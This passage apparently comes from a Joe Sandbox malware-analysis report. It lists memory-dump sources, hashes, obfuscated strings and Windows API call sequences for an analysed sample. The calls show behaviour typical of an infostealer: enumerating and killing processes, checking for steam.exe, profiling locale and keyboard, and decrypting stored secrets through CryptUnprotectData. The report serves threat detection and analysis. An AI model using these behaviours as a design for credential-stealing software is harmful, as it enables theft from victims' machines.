                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0-5t$OL[{$OjWj$R{$THd$mdG>$s\}$w-_]$"7$QU
                          • API String ID: 0-1029472912
                          • Opcode ID: 437fa867fb5c5325fa26b4b9357b91fe7d8d3965cfc861b573a996e54b2a946e
                          • Instruction ID: 3166058c8ebbca26abb2e9b1ddaa7707cdac7d28e975f7e2c86b85f53656d8e5
                          • Opcode Fuzzy Hash: 437fa867fb5c5325fa26b4b9357b91fe7d8d3965cfc861b573a996e54b2a946e
                          • Instruction Fuzzy Hash: 69B227F3A0C3149FE304AE29EC8567AFBE5EF94720F16853DEAC483744EA3558058697
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ".nu$/\~z$7?wN$C1_$Pgm$Ww>n$Y)Ov$\z]{$fNM$$#_x
                          • API String ID: 0-117933904
                          • Opcode ID: 80e3b265d87fd48de31e79af90ccdfb68c9595e93e1852de7a5dcf00a96b3b1f
                          • Instruction ID: 20f2107d4729dc7db58aa7f4f5429141a0d775a426ca2a0ef30ffff782f9da71
                          • Opcode Fuzzy Hash: 80e3b265d87fd48de31e79af90ccdfb68c9595e93e1852de7a5dcf00a96b3b1f
                          • Instruction Fuzzy Hash: 5EB219F3A0C2049FE7046E2DEC8567ABBE6EFD4720F1A853DE6C483744EA7558058693
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006446B9
                          • Process32First.KERNEL32(00000000,00000128), ref: 006446C9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 006446DB
                          • StrCmpCA.SHLWAPI(?,?), ref: 006446ED
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00644702
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00644711
                          • CloseHandle.KERNEL32(00000000), ref: 00644718
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00644726
                          • CloseHandle.KERNEL32(00000000), ref: 00644731
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: 6dad6fa43c824f49fa19af2be62945c3e7f3cb2f9b8c55d781d0f53fa850589b
                          • Instruction ID: e017c55b18f9fd93e4f7fe282e3a759332d242961c0eebc5db741fbdfa649708
                          • Opcode Fuzzy Hash: 6dad6fa43c824f49fa19af2be62945c3e7f3cb2f9b8c55d781d0f53fa850589b
                          • Instruction Fuzzy Hash: E201D631501314EBE7205B61EC8EFFA377DFB49B12F000089F945E2280EF7899458B60
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00644628
                          • Process32First.KERNEL32(00000000,00000128), ref: 00644638
                          • Process32Next.KERNEL32(00000000,00000128), ref: 0064464A
                          • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00644660
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00644672
                          • CloseHandle.KERNEL32(00000000), ref: 0064467D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                          • String ID: steam.exe
                          • API String ID: 2284531361-2826358650
                          • Opcode ID: d1025c3d00dfe12f93950fa115bd96ddbe0e3a2910a2cfd18cd208b28f6ed534
                          • Instruction ID: 2604bb5b1d8a0a5f1e30d9b93ed67868a64cce58998a161172fdf16c7beb8684
                          • Opcode Fuzzy Hash: d1025c3d00dfe12f93950fa115bd96ddbe0e3a2910a2cfd18cd208b28f6ed534
                          • Instruction Fuzzy Hash: 7401A2716012249BD720AB61AC4AFEA77BCFF0D352F0001D5ED48D1180EF7889948BE1
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00634B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00634B7F
                          • lstrlen.KERNEL32(00654CA8), ref: 00634B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634BA7
                          • lstrcat.KERNEL32(00000000,00654CA8), ref: 00634BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00634BFA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID:
                          • API String ID: 2567437900-0
                          • Opcode ID: 0a3f3d1e0c6dbe5ba1c1d3afdbcaf47118b68a0e582cf157acfbe3c7a92347b3
                          • Instruction ID: c7b74aaa6d6da2a8fccbcddd730da42643d56c3dbadb2147e1d8556ab41a0225
                          • Opcode Fuzzy Hash: 0a3f3d1e0c6dbe5ba1c1d3afdbcaf47118b68a0e582cf157acfbe3c7a92347b3
                          • Instruction Fuzzy Hash: B8313071511A26ABC762EF25FC96ADEB7A7BF40311F001228F84A97A55DB34EC018F94
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Q/$4K$AjA$YE`8$`1Uo$ia7}$osO$ha
                          • API String ID: 0-1238677034
                          • Opcode ID: b84bdfc7ce4eb1ea029b2de3e3cabd676260eba1acbd47de4ad275ae5b0617ed
                          • Instruction ID: 1e05bdd263a2a647698eef54739ac766d909bba1c343bae646a1c95b7bd1aa3a
                          • Opcode Fuzzy Hash: b84bdfc7ce4eb1ea029b2de3e3cabd676260eba1acbd47de4ad275ae5b0617ed
                          • Instruction Fuzzy Hash: A3B219F360C2049FE3046E29EC8567AFBE9EFD4720F1A893DE6C4C3744EA3558458696
                          APIs
                            • Part of subcall function 006471E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006471FE
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00642D9B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00642DAD
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00642DBA
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00642DEC
                          • LocalFree.KERNEL32(00000000), ref: 00642FCA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 0fe50bafbf940bd087433e8a926955218015676063c030f32283054b6684479d
                          • Instruction ID: 53efd3685792cb27993dac8fdfc1882866bbbed746ee93c0734713f00aa514ed
                          • Opcode Fuzzy Hash: 0fe50bafbf940bd087433e8a926955218015676063c030f32283054b6684479d
                          • Instruction Fuzzy Hash: C4B10870900615CFC755CF18C948B99BBF2FB44325F69C1A9E4089B3A2D77A9D86CF80
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 3Nv$9w~/$;]\$R,e$d;$y6}W
                          • API String ID: 0-3685421311
                          • Opcode ID: 9a8303c24328fa8896c5e8bebbd4b04afee38decfc4a1ca580b8d1eba1960191
                          • Instruction ID: 069c1d0541f57e23d1d030d42028d133f41f3898966aba608dc9807b51c923ce
                          • Opcode Fuzzy Hash: 9a8303c24328fa8896c5e8bebbd4b04afee38decfc4a1ca580b8d1eba1960191
                          • Instruction Fuzzy Hash: 86B228F390C2009FE304AE2DEC9567AFBE9EBD4720F1A893DE6C5C3744EA3558058656
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00642C42
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00642C49
                          • GetTimeZoneInformation.KERNEL32(?), ref: 00642C58
                          • wsprintfA.USER32 ref: 00642C83
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID: wwww
                          • API String ID: 3317088062-671953474
                          • Opcode ID: 5f90ddb4d6881162a565975cee0a245b3e0e7834aa379d142a1c06a9c7b179bb
                          • Instruction ID: c44842177f272e0545f151da4fb6880f3717f7427986f9ce38042a9ad55c02ac
                          • Opcode Fuzzy Hash: 5f90ddb4d6881162a565975cee0a245b3e0e7834aa379d142a1c06a9c7b179bb
                          • Instruction Fuzzy Hash: A201F771A40714EBD7188F58DC49B69B769EB84722F004729F916D73C0D778190486D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: "Qr{$"x~m$P9$z(s}$B?e
                          • API String ID: 0-3148019840
                          • Opcode ID: 7d52ad395d01491de1f75ee5e3198cb1ca3c9a1b2031e1fde439ada002d17589
                          • Instruction ID: 642985efc0a062d58f22569419492fd0bc3a6006832e25b4489234658c44228b
                          • Opcode Fuzzy Hash: 7d52ad395d01491de1f75ee5e3198cb1ca3c9a1b2031e1fde439ada002d17589
                          • Instruction Fuzzy Hash: FDB2D4F3A0C6009FE304AE29DC8567ABBE9EF94720F1A493DEAC4C7740E63558458797
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0062775E
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00627765
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0062778D
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 006277AD
                          • LocalFree.KERNEL32(?), ref: 006277B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
